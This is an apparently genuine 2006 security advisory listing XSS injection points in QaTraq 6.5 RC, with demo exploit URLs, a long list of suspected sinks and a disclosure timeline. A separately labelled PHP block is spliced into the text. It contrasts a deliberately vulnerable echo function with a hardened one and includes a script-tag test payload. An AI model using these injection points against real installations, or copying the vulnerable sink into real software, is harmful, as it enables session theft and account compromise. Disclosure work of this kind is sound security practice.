
QaTraq 6.5 RC: Multiple XSS Vulnerabilities



============================================================
QaTraq 6.5 RC: Multiple XSS Vulnerabilities
============================================================
Technical University of Vienna Security Advisory
TUVSA-0606-001, June 23, 2006
============================================================


Affected applications
----------------------

QaTraq (http://sourceforge.net/projects/qatraq/)

Versions 6.5 RC and prior.


Description
------------

There are a number of reflected XSS vulnerabilities, some of which are also stored XSS vulnerabilities and perhaps even SQL injection vulnerabilities. The affected program points as well as demo exploits are given below. The exploits have been tested with the user logged in as admin and register_globals enabled. It is possible that some vulnerabilities do not require register_globals to be enabled, although we have not tested this. Some of the parameters in the given sample exploits (mainly "id" params) have to be adjusted to the given installation to match existing database entries.

In addition to the program points for which exploits are given, we have listed about 200 places that are very similar in structure. Although we have not explicitly tested them with exploits, we suspect that they are vulnerable as well.
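The sink pattern behind these findings, as an added illustration that is neither QaTraq code nor part of the advisory: a request parameter echoed unencoded into an HTML attribute (as with the msg and link_print parameters above), next to a hardened version that reads input explicitly, encodes for the output context and allow-lists link targets. The helper names and the page list are assumptions.

```php
<?php
// Added example (not QaTraq code): the sink pattern the advisory describes,
// shown vulnerable and hardened. $msg and $link_print are parameter names
// taken from the advisory; helper names and the page list are assumptions.

// Vulnerable: under register_globals, $msg and $link_print arrive straight
// from the query string and are echoed unencoded, so a value containing '">
// closes the attribute and the remainder is parsed as markup (reflected XSS).
function render_vulnerable(string $msg, string $link_print): string
{
    return '<p class="msg">' . $msg . '</p>'
         . '<a href="' . $link_print . '">Print</a>';
}

// Encode for an HTML element or attribute context; ENT_QUOTES covers both
// quote styles so the value can never terminate an attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Link parameters such as link_print only make sense as application pages,
// so validate against an allow-list of relative paths instead of only encoding.
function safe_link(string $target, array $allowed_pages, string $default): string
{
    $parts = parse_url($target);
    if ($parts === false || isset($parts['scheme']) || isset($parts['host'])) {
        return h($default);                  // absolute or malformed: refuse
    }
    $path = $parts['path'] ?? '';
    return in_array($path, $allowed_pages, true) ? h($target) : h($default);
}

// Hardened: read input explicitly from $_GET (never rely on register_globals),
// then encode or validate each value for the context it lands in.
function render_hardened(array $get): string
{
    $msg   = isset($get['msg']) ? (string) $get['msg'] : '';
    $link  = isset($get['link_print']) ? (string) $get['link_print'] : '';
    $pages = ['queries_view_search.php'];    // page named in the advisory
    return '<p class="msg">' . h($msg) . '</p>'
         . '<a href="' . safe_link($link, $pages, 'queries_view_search.php') . '">Print</a>';
}

// Constructed sample input mirroring the advisory's attribute-breaking '"> payload.
$sample = [
    'msg'        => '<script>alert(1)</script>',
    'link_print' => '\'"><script>alert(1)</script>',
];
echo render_vulnerable($sample['msg'], $sample['link_print']), "\n";   // markup survives
echo render_hardened($sample), "\n";                                    // encoded, link replaced
```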
=0D
top.inc
---------

line 1005
http://localhost/qatraq65rc/queries_view_search.php?link_print='">

line 1007
http://localhost/qatraq65rc/queries_view_search.php?link_upgrade='">

line 1020
http://localhost/qatraq65rc/queries_view_search.php?link_sql='">

line 1041
http://localhost/qatraq65rc/queries_view_search.php?link_next=">

line 1054
http://localhost/qatraq65rc/queries_view_search.php?link_prev=">

line 1067
http://localhost/qatraq65rc/queries_view_search.php?link_list=">

=0D
components_copy_content.php
-----------------------------

line 233
http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1&msg=
[product_id and id (= component id) must exist in the database]

line 238
- use the attack page:
action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">

line 260
- analogous to 238:
action="http://localhost/qatraq65rc/components_copy_content.php?product_id=1&id=1">


components_modify_content.php
-------------------------------

line 213
http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1&msg=

line 218
action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">

line 240
action="http://localhost/qatraq65rc/components_modify_content.php?product_id=1&id=1">


components_new_content.php
-----------------------------

line 188
http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1&msg=

line 193
action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">

line 215
action="http://localhost/qatraq65rc/components_new_content.php?product_id=1&id=1">


design_copy_content.php
-------------------------

line 262
- use this page [plan_id must exist in the database]:
action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

line 276
action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">

line 313
action="http://localhost/qatraq65rc/design_copy_content.php?id=777&plan_id=1">


design_copy_plan_search.php
-----------------------------

line 106
action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">

line 107
action="http://localhost/qatraq65rc/design_copy_plan_search.php?id=777&plan_id=1">


design_modify_content.php
---------------------------

line 282
action="http://localhost/qatraq65rc/design_modify_content.php?id=1&plan_id=1">

line 298
- $new_doc_id is constructed from $major_version and $minor_version on line 189; these two are only set if POST['version_increment'] is set; use this page [and watch for a suitable id]:
action="http://localhost/qatraq65rc/design_modify_content.php?id=7">

line 311
- $new_version, analogous to 298

line 354
action="http://localhost/qatraq65rc/design_modify_content.php?id=10">


design_new_content.php
------------------------

line 226
action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

line 240
action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">

line 276
action="http://localhost/qatraq65rc/design_new_content.php?id=777&plan_id=1">


design_new_search.php
-----------------------

line 99
http://localhost/qatraq65rc/design_new_search.php?plan_name=">

line 100
http://localhost/qatraq65rc/design_new_search.php?plan_desc=">


download.php
-------------

line 31
http://localhost/qatraq65rc/download.php?file_name=


login.php
----------

line 88
http://localhost/qatraq65rc/login.php?username=">

line 98
http://localhost/qatraq65rc/login.php?password=">


phase_copy_content.php
------------------------

line 245
action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

line 259
action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">

line 285
action="http://localhost/qatraq65rc/phase_copy_content.php?id=777&plan_id=1">


phase_delete_search.php
-------------------------

line 176
action="http://localhost/qatraq65rc/phase_delete_search.php">


phase_modify_content.php
--------------------------

line 273
action="http://localhost/qatraq65rc/phase_modify_content.php?id=2&plan_id=1">

line 289
action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">

line 302
- $new_version, analogous to 289

line 335
action="http://localhost/qatraq65rc/phase_modify_content.php?id=2">


phase_modify_search.php
------------------------

line 177
action="http://localhost/qatraq65rc/phase_modify_search.php">


phase_new_content.php
----------------------

line 209
action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

line 223
action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">

line 252
action="http://localhost/qatraq65rc/phase_new_content.php?id=777&plan_id=1">


phase_view_search.php
----------------------

line 176
action="http://localhost/qatraq65rc/phase_view_search.php">


products_copy_content.php
---------------------------

line 175
http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1&msg=

line 180
action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">

line 185
action="http://localhost/qatraq65rc/products_copy_content.php?product_id=1&id=1">

Other suspicious places (without exploits)
---------------------------------------------

- products_copy_search.php, line 116, $product_name
- products_copy_search.php, line 117, $product_desc
- products_delete_search.php, line 116, $product_name
- products_delete_search.php, line 117, $product_desc
- products_modify_content.php, line 186, $msg
- products_modify_content.php, line 191, $product_name
- products_modify_content.php, line 196, $product_desc
- products_modify_search.php, line 116, $product_name
- products_modify_search.php, line 117, $product_desc
- products_new_content.php, line 157, $msg
- products_new_content.php, line 162, $product_name
- products_new_content.php, line 167, $product_desc
- products_view_search.php, line 116, $product_name
- products_view_search.php, line 117, $product_desc
- queries_copy_content.php, line 182, $msg
- queries_copy_content.php, line 195, $title
- queries_copy_content.php, line 227, $description
- queries_copy_search.php, line 154, $title
- queries_copy_search.php, line 155, $id
- queries_copy_search.php, line 170, $description
- queries_delete_search.php, line 152, $title
- queries_delete_search.php, line 153, $id
- queries_delete_search.php, line 167, $description
- queries_modify_content.php, line 247, $msg
- queries_modify_content.php, line 260, $title
- queries_modify_content.php, line 292, $description
- queries_modify_content.php, line 308, $query
- queries_modify_search.php, line 152, $title
- queries_modify_search.php, line 153, $id
- queries_modify_search.php, line 167, $description
- queries_new_content.php, line 162, $msg
- queries_new_content.php, line 174, $title
- queries_new_content.php, line 222, $query
- queries_view_search.php, line 156, $title
- queries_view_search.php, line 157, $id
- queries_view_search.php, line 172, $description
- reports_copy_content.php, line 202, $msg
- reports_copy_content.php, line 215, $title
- reports_copy_content.php, line 247, $description
- reports_copy_content.php, line 255, $tmt
- reports_copy_search.php, line 147, $title
- reports_copy_search.php, line 148, $id
- reports_delete_search.php, line 148, $title
- reports_delete_search.php, line 149, $id
- reports_modify_content.php, line 266, $msg
- reports_modify_content.php, line 279, $title
- reports_modify_content.php, line 311, $description
- reports_modify_content.php, line 319, $query $tmt
- reports_modify_search.php, line 148, $title
- reports_modify_search.php, line 149, $id
- reports_new_content.php, line 162, $msg
- reports_new_content.php, line 174, $title
- reports_new_content.php, line 190, $report_type
- reports_new_content.php, line 206, $description
- reports_new_content.php, line 214, $query $tmt
- reports_view_content.php, line 187, $tmt
- reports_view_content.php, line 194, $results
- reports_view_search.php, line 147, $title
- reports_view_search.php, line 148, $id
- requ_copy_content.php, line 217, $title
- requ_copy_content.php, line 252, $url
- requ_copy_content.php, line 274, $content
- requ_modify_content.php, line 209, $title
- requ_modify_content.php, line 244, $url
- requ_modify_content.php, line 266, $content
- requ_new_content.php, line 185, $title
- requ_new_content.php, line 214, $url
- requ_new_content.php, line 237, $content
- requ_new_search.php, line 99, $product_name
- requ_new_search.php, line 100, $product_desc
- results_modify_multiple.php, line 657, -> includes/ui.inc, line 116
- results_modify_multiple.php, line 395, $msg
- results_modify_search.php, line 182, $content
- results_modify_single.php, line 429, $msg
- results_modify_single.php, line 850, $TestDate
- results_view_multiple.php, line 125, $msg
- results_view_search.php, line 182, $content
- results_view_single.php, line 164, $msg
- roles_copy_content.php, line 190, $msg
- roles_copy_content.php, line 195, $role_name
- roles_copy_content.php, line 200, $role_desc
- roles_copy_search.php, line 117, $role_name
- roles_copy_search.php, line 118, $role_desc
- roles_delete_search.php, line 118, $role_name
- roles_delete_search.php, line 119, $role_desc
- roles_modify_content.php, line 203, $msg
- roles_modify_content.php, line 208, $role_name
- roles_modify_content.php, line 213, $role_desc
- roles_modify_search.php, line 118, $role_name
- roles_modify_search.php, line 119, $role_desc
- roles_new_content.php, line 172, $msg
- roles_new_content.php, line 177, $role_name
- roles_new_content.php, line 182, $role_desc
- roles_view_search.php, line 118, $role_name
- roles_view_search.php, line 119, $role_desc
- test_cases_copy_content.php, line 357, -> includes/ui.inc, line 198, $base_url
- test_cases_copy_content.php, line 289, $title
- test_cases_copy_content.php, line 303, $version
- test_cases_copy_content.php, line 382, $content
- test_cases_modify_content.php, line 383, $title
- test_cases_modify_content.php, line 399, $new_doc_id
- test_cases_modify_content.php, line 412, $new_version
- test_cases_modify_content.php, line 486, $content
- test_cases_modify_content.php, line 536, $filter_title
- test_cases_modify_content.php, line 537, $filter_tsc_id
- test_cases_new_content.php, line 341, $title
- test_cases_new_content.php, line 355, $version
- test_cases_new_content.php, line 431, $content
- test_cases_new_content.php, line 481, $filter_title
- test_cases_new_content.php, line 482, $filter_tsc_id
- test_cases_new_search.php, line 99, $product_name
- test_cases_new_search.php, line 100, $product_desc
- test_cases_view_content.php, line 302, $filter_tsc_id
- test_plans_copy_content.php, line 274, $title
- test_plans_copy_content.php, line 292, $version
- test_plans_copy_content.php, line 344, $content
- test_plans_modify_content.php, line 306, $title
- test_plans_modify_content.php, line 322, $new_doc_id
- test_plans_modify_content.php, line 339, $new_version
- test_plans_modify_content.php, line 398, $content
- test_plans_new_content.php, line 240, $title
- test_plans_new_content.php, line 258, $version
- test_plans_new_content.php, line 313, $content
- test_plans_new_search.php, line 96, $project_name
- test_plans_new_search.php, line 97, $project_desc
- test_scripts_copy_content.php, line 354, $title
- test_scripts_copy_content.php, line 368, $version
- test_scripts_copy_content.php, line 500, $content
- test_scripts_copy_design_search.php, line 100, $design_title
- test_scripts_copy_search.php, line 180, $content
- test_scripts_delete_search.php, line 182, $content
- test_scripts_include_cases_search.php, line 417, -> includes/ui.inc, line 34, $table_name
- test_scripts_include_cases_search.php, line 1068, -> includes/ui.inc, line 34, $table_name
- test_scripts_include_cases_search.php, line 875, -> includes/ui.inc, line 198, $base_url
- test_scripts_include_cases_search.php, line 427, $msg
- test_scripts_include_cases_search.php, line 576, $test_script[Title]
- test_scripts_include_cases_search.php, line 798, $tc_msg
- test_scripts_include_cases_search.php, line 809, $tc_title
- test_scripts_include_cases_search.php, line 823, $tc_version
- test_scripts_include_cases_search.php, line 1074, $row[Title]
- test_scripts_include_cases_search.php, line 1084, $row
- test_scripts_include_cases_search.php, line 1087, $row
- test_scripts_include_cases_search.php, line 1096, $row[DocumentID]
- test_scripts_include_cases_search.php, line 1105, $row[ID]
- test_scripts_include_cases_search.php, line 1106, $row[ID]
- test_scripts_include_cases_search.php, line 1108, $row[ID]
- test_scripts_include_cases_search.php, line 1109, $row[ID]
- test_scripts_include_cases_search.php, line 1118, $row
- test_scripts_include_cases_search.php, line 1124, $row $ordering
- test_scripts_include_search.php, line 163, $content
- test_scripts_modify_content.php, line 404, $title
- test_scripts_modify_content.php, line 420, $new_doc_id
- test_scripts_modify_content.php, line 433, $new_version
- test_scripts_modify_content.php, line 581, $content
- test_scripts_modify_content.php, line 726, $ordering_
- test_scripts_modify_search.php, line 181, $content
- test_scripts_new_content.php, line 293, $title
- test_scripts_new_content.php, line 307, $version
- test_scripts_new_content.php, line 426, $content
- test_scripts_new_search.php, line 93, $design_title
- test_scripts_remove_cases_search.php, line 375, -> includes/ui.inc, line 34, $table_name
- test_scripts_remove_cases_search.php, line 138, -> includes/ui.inc, line 34, $table_name
- test_scripts_remove_cases_search.php, line 148, $msg
- test_scripts_remove_cases_search.php, line 256, $test_script[Title]
- test_scripts_remove_cases_search.php, line 381, $row[Title]
- test_scripts_remove_cases_search.php, line 387, $is_selected $row
- test_scripts_remove_cases_search.php, line 393, $row[DocumentID]
- test_scripts_remove_cases_search.php, line 405, $row[Ordering]
- test_scripts_remove_cases_search.php, line 423, $row[Title]
- test_scripts_remove_search.php, line 165, $content
- test_scripts_view_search.php, line 182, $content
- upload.php, line 51
- users_copy_content.php, line 249, $msg
- users_copy_content.php, line 254, $login_name
- users_copy_content.php, line 258, $user_name
- users_copy_content.php, line 263, $user_password
- users_copy_search.php, line 129, $login_name
- users_copy_search.php, line 130, $user_name
- users_copy_search.php, line 131, $default_role
- users_delete_content.php, line 146, $msg
- users_delete_search.php, line 129, $login_name
- users_delete_search.php, line 130, $user_name
- users_delete_search.php, line 131, $default_role
- users_modify_content.php, line 463, -> includes/ui.inc, line 116, $arr_table_vals[table_multi_display_line.$i]
- users_modify_content.php, line 385, $msg
- users_modify_content.php, line 394, $user_name
- users_modify_content.php, line 399, $user_password
- users_modify_search.php, line 127, $login_name
- users_modify_search.php, line 128, $user_name
- users_modify_search.php, line 129, $default_role
- users_new_content.php, line 233, $msg
- users_new_content.php, line 238, $login_name
- users_new_content.php, line 242, $user_name
- users_new_content.php, line 247, $user_password
- users_new_content.php, line 251, $user_password2
- users_view_content.php, line 138, $msg
- users_view_search.php, line 129, $login_name
- users_view_search.php, line 130, $user_name
- users_view_search.php, line 131, $default_role
- versions_copy_content.php, line 370, $msg
- versions_copy_content.php, line 375, $version_name
- versions_copy_content.php, line 380, $version_desc
- versions_modify_content.php, line 345, $msg
- versions_modify_content.php, line 350, $version_name
- versions_modify_content.php, line 355, $version_desc
- versions_new_content.php, line 322, $msg
- versions_new_content.php, line 327, $version_name
- versions_new_content.php, line 332, $version_desc
- versions_new_content.php, line 339, $version_date


Solution
---------

The authors did not respond to our notification, so there is no official solution available yet.

Timeline:

June 2, 2006: Attempt to contact QaTraq developers via "ashmans at users dot sourceforge dot net" and "traq at users dot sourceforge dot net".

June 23, 2006: Advisory submission.


References
-----------

http://www.seclab.tuwien.ac.at/advisories/TUVSA-0606-001.txt


Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at
